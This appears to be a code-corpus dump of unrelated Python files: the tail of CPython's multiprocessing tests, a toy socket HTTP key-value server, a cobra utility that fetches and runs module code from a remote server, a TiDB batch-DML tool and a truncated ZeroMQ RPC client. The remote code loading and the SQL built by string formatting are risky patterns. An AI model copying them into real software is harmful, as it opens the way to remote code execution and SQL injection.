self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
# The pid should be None in the child process, expect for the fork
# context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.process._cleanup()
# Stop the ForkServer process if it's running
from multiprocessing import forkserver
forkserver._forkserver._stop()
# bpo-37421: Explicitly call _run_finalizers() to remove immediately
# temporary directories created by multiprocessing.util.get_temp_dir().
multiprocessing.util._run_finalizers()
test.support.gc_collect()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
app.py
|
import socket
import sys
from threading import Thread
import json
import os
HOST = "127.0.0.1"
PORT = 80
MAX_BUFFER_SIZE = 1024
def main():
initialize_database()
start_server()
# Creates database file
def initialize_database():
# Create database file
if not os.path.exists("db.json"):
with open("db.json", "w+") as db:
db.write("{\n}")
# Read contents of database file
def read_database():
# Read database file
with open("db.json", "r") as db:
storage_file = json.load(db)
return storage_file
# Write content to database file
def write_database(storage_file):
with open("db.json", "w") as file:
json.dump(storage_file, file, indent = 4, sort_keys=True)
# Creates headers for the response
def create_headers(status_code: int, status_text: str, message_body=""):
# Reponse headers
response_protocol = "HTTP/1.1"
response_status_code = status_code
response_status_text = status_text
response_content_type = "application/json; encoding=utf8"
response_connection = "close"
response_content_length = str(len(message_body.encode('utf-8')))
# Create response sections
status_line = (
f"{response_protocol} {response_status_code} {response_status_text}\r\n"
)
connection = f"Connection: {response_connection}\r\n"
content_type = f"Content-Type: {response_content_type}\r\n"
content_length = f"Content-Length: {response_content_length}\r\n"
empty_line = f"\r\n"
# Combine into single string
response_header = (
status_line +
connection +
content_type +
content_length +
empty_line +
message_body
)
# Encode string to utf-8 bytes
response_header_encoded = response_header.encode("utf-8")
return response_header_encoded
# Create & start server socket
def start_server():
# Create server socket
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind socket
try:
server_socket.bind((HOST, PORT))
print(f"Binding server socket to host:{HOST} and port {PORT}")
except:
print(f"Bind failed. Error: {str(sys.exc_info())}")
sys.exit()
# Enable passive listening sockets
server_socket.listen(5)
while True:
# Wait and accept incoming connection
(client_socket, address) = server_socket.accept()
ip, port = str(address[0]), str(address[1])
print(f"Connection from {ip}:{port} has been established.")
try:
Thread(target=client_thread, args=(client_socket, ip, port)).start()
print(f"Client thread for {ip}:{port} has been created.")
except:
print(f"Client thread for {ip}:{port} did not start.")
# Thread for each client
def client_thread(client_socket, ip, port):
# Listen to incomming data
data = receive_data(client_socket)
print(data)
if data:
if data[0] == "GET":
response_headers = do_GET(data)
if data[0] == "POST":
response_headers = do_POST(data)
if data[0] == "PUT":
response_headers = do_PUT(data)
if data[0] == "DELETE":
response_headers = do_DELETE(data)
client_socket.send(response_headers)
client_socket.close()
print(f"Connection from {ip}:{port} has been closed.")
print(f"Client thread for {ip}:{port} has been closed.")
# Get content from request
def get_content(data: list):
# Check for content length
if "Content-Length:" in data:
con_len_index = data.index("Content-Length:")
con_len_value = data[con_len_index + 1]
# If there is no actual content
if con_len_value == "0":
return None
else:
return None
# Check for content type
if "Content-Type:" not in data:
return None
# Return content
return data[-1]
# Handle GET request
def do_GET(data: list):
content = get_content(data)
if content == None:
return create_headers(400, "Bad Request")
storage_data = read_database()
if content in storage_data:
value = storage_data.get(content)
return create_headers(200, "OK", value)
else:
return create_headers(404, "Not Found")
# Handle POST request
def do_POST(data: list):
content = get_content(data)
if content == None:
return create_headers(400, "Bad Request")
storage_data = read_database()
if content in storage_data:
return create_headers(409, "Conflict")
else:
storage_data[content] = ""
write_database(storage_data)
return create_headers(201, "Created")
# Handle PUT request
def do_PUT(data: list):
content = get_content(data)
if content == None:
return create_headers(400, "Bad Request")
storage_data = read_database()
content_dict = json.loads(content)
content_key = list(content_dict.keys())[0]
if content_key in storage_data:
storage_data.update(content_dict)
write_database(storage_data)
return create_headers(200, "OK")
else:
return create_headers(404, "Not Found")
# Handle DELETE request
def do_DELETE(data: list):
content = get_content(data)
if content == None:
return create_headers(400, "Bad Request")
storage_data = read_database()
if content in storage_data:
storage_data.pop(content)
write_database(storage_data)
return create_headers(200, "OK")
else:
return create_headers(404, "Not Found")
# Receive & process data
def receive_data(client_socket):
client_data = client_socket.recv(MAX_BUFFER_SIZE)
decoded_data = (
str(client_data).strip("b'").rstrip().replace("\\n", "").replace("\\r", " ").replace("\\t", "")
)
data_variables = str(decoded_data).split()
return data_variables
if __name__ == "__main__":
main()
|
remoteapp.py
|
'''
A utility for creating "remote applications" which are dcode
enabled and cobra driven. All API arguments/returns *must* be
serializable using msgpack.
NOTE: enabling a dcode server means source for local python modules
will be delivered directly to clients over the network!
Running a remote application will also attempt to prefer code from
the server rather than the local python current working directory.
( and uses multiprocessing for import/process isolation )
'''
import os
import sys
import importlib
import subprocess
import multiprocessing
import cobra
import cobra.dcode
class RemoteAppServer:
def __init__(self):
pass
def shareRemoteApp(name, appsrv=None, daemon=None, port=443):
'''
Fire an appropriate dcode enabled cobra daemon and share
the appsrv object with the given name.
'''
if appsrv == None:
appsrv = RemoteAppServer()
if daemon == None:
daemon = cobra.CobraDaemon(msgpack=True, port=port)
daemon.fireThread()
cobra.dcode.enableDcodeServer(daemon=daemon)
return daemon.shareObject(appsrv, name)
def getAndRunApp(uri):
# We dont want our *local* code, we want the remote code.
cwd = os.getcwd()
if cwd in sys.path:
sys.path.remove(cwd)
if '' in sys.path:
sys.path.remove('')
duri = cobra.swapCobraObject(uri, 'DcodeServer')
cobra.dcode.addDcodeUri(duri)
server = cobra.CobraProxy(uri,msgpack=True)
scheme, host, port, name, urlparams = cobra.chopCobraUri( uri )
module = importlib.import_module(name)
if hasattr(module, 'remotemain'):
module.remotemain(server)
else:
module.main()
def runRemoteApp(uri, join=True):
p = multiprocessing.Process(target=getAndRunApp, args=(uri,))
p.start()
if join:
p.join()
def execRemoteApp(uri):
'''
Exec a remoteapp without using multiprocessig ( may be needed if fork()
causes the child to have an unacceptably dirty environment )
'''
subprocess.Popen([sys.executable, '-m', 'cobra.remoteapp', uri])
def main():
runRemoteApp(sys.argv[1])
if __name__ == '__main__':
sys.exit(main())
|
tk_dml.py
|
# coding=utf-8
# @Time: 2021/8/20 14:38
# @Author: [email protected]
"""
Usage:
支持以下几种大批量DML语句:
delete from <t> where <...>
update <t> set <...> where <...>
insert into <t_to> select <...> from <t_from> where <...>
默认使用_tidb_rowid(或数字主键)作为拆分列,不支持设置了SHARD_ROW_ID_BITS或auto_random的表
依据_tidb_rowid和batch_size和将SQL拆分为多个batch,并发max_workers个batch
"""
import argparse
import toml
from concurrent.futures import ThreadPoolExecutor
from datetime import datetime
from queue import Queue, Empty
from threading import Thread
from time import sleep
from traceback import format_exc
import pymysql
import sqlparse
import sqlparse.tokens as T
from utils.logger import FileLogger
# Global Constants
SUPPORTED_SQL_TYPES = ["DELETE", "UPDATE", "INSERT"]
def argParse():
parser = argparse.ArgumentParser(description="TiDB Massive DML Tool.")
parser.add_argument("-f", dest="config", type=str, required=True, help="config file")
parser.add_argument("-l", dest="log", type=str, help="Log File Name, Default <host>.log.<now>")
args = parser.parse_args()
return args
class Config(object):
def __init__(self, config_file, log_file=None):
# toml config file
self.config_file = config_file
# log file
self.log_file = log_file
# db connection info
self.host, self.port, self.user, self.password, self.db = None, None, None, None, None
# sql split info
self.table, self.sql, self.start_rowid, self.end_rowid, self.batch_size = None, None, None, None, None
# execute info
self.max_workers, self.execute = None, None
def parse(self):
with open(self.config_file, encoding='utf8') as f:
config = toml.load(f)
self.host = config["basic"]["host"]
self.port = config["basic"]["port"]
self.user = config["basic"]["user"]
self.password = config["basic"]["password"]
self.db = config["dml"]["db"]
self.table = config["dml"]["table"]
self.sql = config["dml"]["sql"]
self.start_rowid = config["dml"].get("start_rowid", None)
self.end_rowid = config["dml"].get("end_rowid", None)
self.batch_size = config["dml"].get("batch_size", 1000)
self.max_workers = config["dml"].get("max_workers", 50)
self.execute = config["dml"].get("execute", False)
if self.log_file is None:
self.log_file = f"{self.host}.log.{datetime.now().strftime('%Y-%m-%dT%H:%M:%S')}"
class MySQLConnectionPool(object):
def __init__(self, host=None, port=None, user=None, password=None, db=None, pool_size=5):
self.host = host
self.port: int = port
self.user = user
self.password = password
self.db = db
self.pool_size = pool_size
self.pool: Queue = Queue(maxsize=self.pool_size)
def init(self):
logger.info("Initializing MySQL Connection Pool...")
for i in range(self.pool_size):
try:
conn = pymysql.connect(host=self.host, port=self.port, user=self.user, password=self.password,
database=self.db, charset="utf8mb4")
conn.autocommit(True)
self.pool.put(conn)
except Exception as e:
logger.fatal("Create mysql connections failed, please check database connectivity! Exit!\n%s", e)
raise e
logger.info("Initializing MySQL Connection Pool Finished...")
def close(self):
logger.info("Closing MySQL Connection Pool...")
for i in range(self.pool_size):
try:
conn: pymysql.Connection = self.pool.get(timeout=5)
conn.close()
except Empty:
logger.info("Connection Pool is empty, exit...")
return
except Exception as e:
logger.info(f"Connection Pool close with Exception: {e}")
logger.info("Closing MySQL Connection Pool Finished...")
def get(self):
return self.pool.get()
def put(self, conn: pymysql.Connection):
self.pool.put(conn)
def start_monitor(self):
# 启动一个子线程来监控连接池的size
def report_size():
while True:
logger.info(f"ConnectionPool Monitor: Size {self.pool.qsize()}")
sleep(10)
thd = Thread(target=report_size, daemon=True)
thd.start()
# Table Which Batches Division Based On
class Table(object):
def __init__(self, table_name=None, db=None, conn=None):
self.name = table_name
self.db = db
self.conn: pymysql.Connection = conn
self.rowid = None
self.rowid_min = None
self.rowid_max = None
self.is_rowid_sharded = False
def load(self):
logger.info(f"Loading Table Info of {self.db}.{self.name} ...")
with self.conn.cursor() as c:
sql = f"select COLUMN_NAME,DATA_TYPE from information_schema.COLUMNS where table_schema='{self.db}' " \
f"and table_name='{self.name}' and COLUMN_KEY='PRI';"
c.execute(sql)
pri_info = c.fetchall()
if len(pri_info) == 1 and pri_info[0][1] in ('int', 'bigint'): # 没有主键时rowid也是_tidb_rowid
self.rowid = pri_info[0][0]
else:
self.rowid = "_tidb_rowid"
sql = f"select TIDB_ROW_ID_SHARDING_INFO from information_schema.TABLES where TABLE_SCHEMA='{self.db}' " \
f"and TABLE_NAME='{self.name}'"
try:
c.execute(sql)
rowid_shard_info = c.fetchone()[0]
if not rowid_shard_info.startswith("NOT_SHARDED"):
self.is_rowid_sharded = True
except Exception as e:
if e.args[0] == 1054:
print("Warning: TiDB version <=4.0.0, Please check if Rowid was sharded before execution!")
pass
# 小于4.0的版本没有TIDB_ROW_ID_SHARDING_INFO字段,因此打印一句警告,提示需要注意rowid是否分片
else:
raise e
sql = f"select min({self.rowid}),max({self.rowid}) from {self.db}.{self.name};"
c.execute(sql)
self.rowid_min, self.rowid_max = c.fetchone()
logger.info(f"Load Table Info of {self.db}.{self.name} Done.")
class SQLOperator(object):
def __init__(self, pool: MySQLConnectionPool = None, table: Table = None, sql=None, batch_size=None,
max_workers=None, start_rowid=None, end_rowid=None, execute=None):
self.table: Table = table
self.sql = sql
self.batch_size = batch_size
self.max_workers = max_workers
self.start_rowid = int(start_rowid) if start_rowid else self.table.rowid_min
self.end_rowid = int(end_rowid) if end_rowid else self.table.rowid_max
self.execute = execute
self.connction_pool: MySQLConnectionPool = pool
def validate(self):
logger.info("Validating SQL Start...")
"""
格式化SQL:
1.通过sqlparse.format进行空格与缩进符的标准化
2.不支持DML以外的SQL类型
3.不支持未包含where条件的SQL
4.不支持设置了SHARD_ROW_ID_BITS或者auto_random的表
"""
# 1
self.sql = sqlparse.format(self.sql, reindent_aligned=True, use_space_around_operators=True,
keyword_case="upper")
logger.info(f"SQL will be batched: \n{self.sql}")
# 2
parsed_sql = sqlparse.parse(self.sql)[0]
sql_type = parsed_sql.get_type()
if sql_type not in SUPPORTED_SQL_TYPES:
raise Exception(f"Unsupported SQL type: {sql_type}!")
# 3
sql_tokens = parsed_sql.tokens
where_token = list(filter(lambda token: isinstance(token, sqlparse.sql.Where), sql_tokens))
if len(where_token) == 0:
raise Exception("No where condition in SQL(try where 1=1), exit...")
# 4
if self.table.is_rowid_sharded:
raise Exception(f"Table {self.table.name} was set SHARD_ROW_ID_BITS or AUTO_RANDOM! exit...")
logger.info(f"Rowid [{self.table.rowid}] will be used for batching.")
logger.info("Validating SQL Done...")
def run(self):
thread_count = (self.end_rowid - self.start_rowid) // self.batch_size + 1
logger.info(f"Max Thread Count: {thread_count}, Rowid Range [{self.start_rowid},{self.end_rowid}]")
if not self.execute:
# 当不实际执行SQL只打印时,只跑1个batch输出示例SQL即可:
with ThreadPoolExecutor(max_workers=1) as pool:
pool.submit(self.__run_batch,
self.start_rowid,
self.start_rowid + self.batch_size,
1,
thread_count)
else:
i = 0 # 每1000个线程释放一次concurrent.futures对象,因为累计futures对象过多后会导致内存溢出
while i < thread_count:
with ThreadPoolExecutor(max_workers=self.max_workers) as pool:
for j in range(i, i + 1000):
pool.submit(self.__run_batch,
self.start_rowid + (j * self.batch_size),
self.start_rowid + ((j + 1) * self.batch_size),
j + 1,
thread_count)
i += 1000
def __run_batch(self, start: int, stop: int, batch_id, max_batch_id):
try:
# pymysql不支持prepare statement,所以我们选择每个thread自己拼sql
sql_tokens = sqlparse.parse(self.sql)[0].tokens
sql_tokens = list(filter(lambda token: token.ttype not in (T.Whitespace, T.Newline), sql_tokens))
rowid_condition = "WHERE {0}.{1} >= {2} AND {0}.{1} < {3} AND".format(self.table.name, self.table.rowid,
start, stop)
for i in range(len(sql_tokens)):
if isinstance(sql_tokens[i], sqlparse.sql.Where):
sql_tokens[i].value = sql_tokens[i].value.replace("WHERE", rowid_condition)
break
sql_token_values = list(map(lambda token: token.value, sql_tokens))
batch_sql = ' '.join(sql_token_values)
except Exception as e:
logger.error(f"Batch {batch_id} failed with exeception {e}, exit... Exception:\n {format_exc()}")
raise
if self.execute:
conn = self.connction_pool.get()
try:
start_time = datetime.now()
with conn.cursor() as c:
affected_rows = c.execute(batch_sql)
conn.commit()
end_time = datetime.now()
logger.info(f"Batch {batch_id} of {max_batch_id} OK, {affected_rows} Rows Affected ("
f"{end_time - start_time}).\nSQL: {batch_sql}")
except Exception as e:
logger.error(f"Batch {batch_id} of {max_batch_id} Failed: {e}, Exception:\n {format_exc()}")
raise
finally:
if conn:
self.connction_pool.put(conn)
else:
logger.info(f"Batch {batch_id} of {max_batch_id} Dry Run:\nSQL: {batch_sql}")
if __name__ == '__main__':
args = argParse()
config_file, log_file = args.config, args.log
conf = Config(config_file=config_file, log_file=log_file)
conf.parse()
logger = FileLogger(filename=conf.log_file)
print(f"See logs in {conf.log_file} ...")
# create connection pool
pool = MySQLConnectionPool(host=conf.host, port=int(conf.port), user=conf.user, password=conf.password,
db=conf.db, pool_size=conf.max_workers * 2)
pool.init()
pool.start_monitor()
# load table info
conn = pool.get()
table = Table(table_name=conf.table, db=conf.db, conn=conn)
table.load()
pool.put(conn)
# start sql operator
operator = SQLOperator(pool=pool, table=table, sql=conf.sql, batch_size=conf.batch_size, execute=conf.execute,
max_workers=conf.max_workers, start_rowid=conf.start_rowid, end_rowid=conf.end_rowid)
operator.validate()
operator.run()
# close connection pool
pool.close()
|
client.py
|
# -*- encoding: utf-8 -*-
"""
@File :client.py
@Desc :客户端
@Date :2022-03-03 10:42
"""
import threading
from datetime import datetime
from functools import lru_cache
import zmq
from zmq.auth.thread import ThreadAuthenticator
from zmq.backend.cython.constants import NOBLOCK
from .exception import RemoteException
from .constant import KEEP_ALIVE_TOPIC,KEEP_ALIVE_TOLERANCE
class RpcClient:
def __init__(self):
self.__context = zmq.Context()
self.__socket_req = self.__context.socket(zmq.REQ)
self.__socket_req.setsockopt(zmq.LINGER, 0)
#self.__poller = zmq.Poller()
#self.__poller.register(self.__socket_req, zmq.POLLIN)
self.__socket_sub = self.__context.socket(zmq.SUB)
self.__active = False
self.__thread = None
self.__lock = threading.Lock()
self.__authenticator = None# Authenticator used to ensure data security
self._last_received_ping = str(datetime.utcnow())
@lru_cache(100)
def __getattr__(self, name):
def dorpc(*args, **kwargs):
timeout = kwargs.pop('timeout',0)
req = [name, args, kwargs]
rep = None
with self.__lock:
self.__socket_req.send_json(req)
if not timeout or self.__socket_req.poll(timeout):
rep = self.__socket_req.recv_json()
if not rep:
raise TimeoutError('RpcServer no response in {} second(s)'.format(timeout/1000.0))
elif rep[0]:
return rep[1]
else:
raise RemoteException(rep[1])
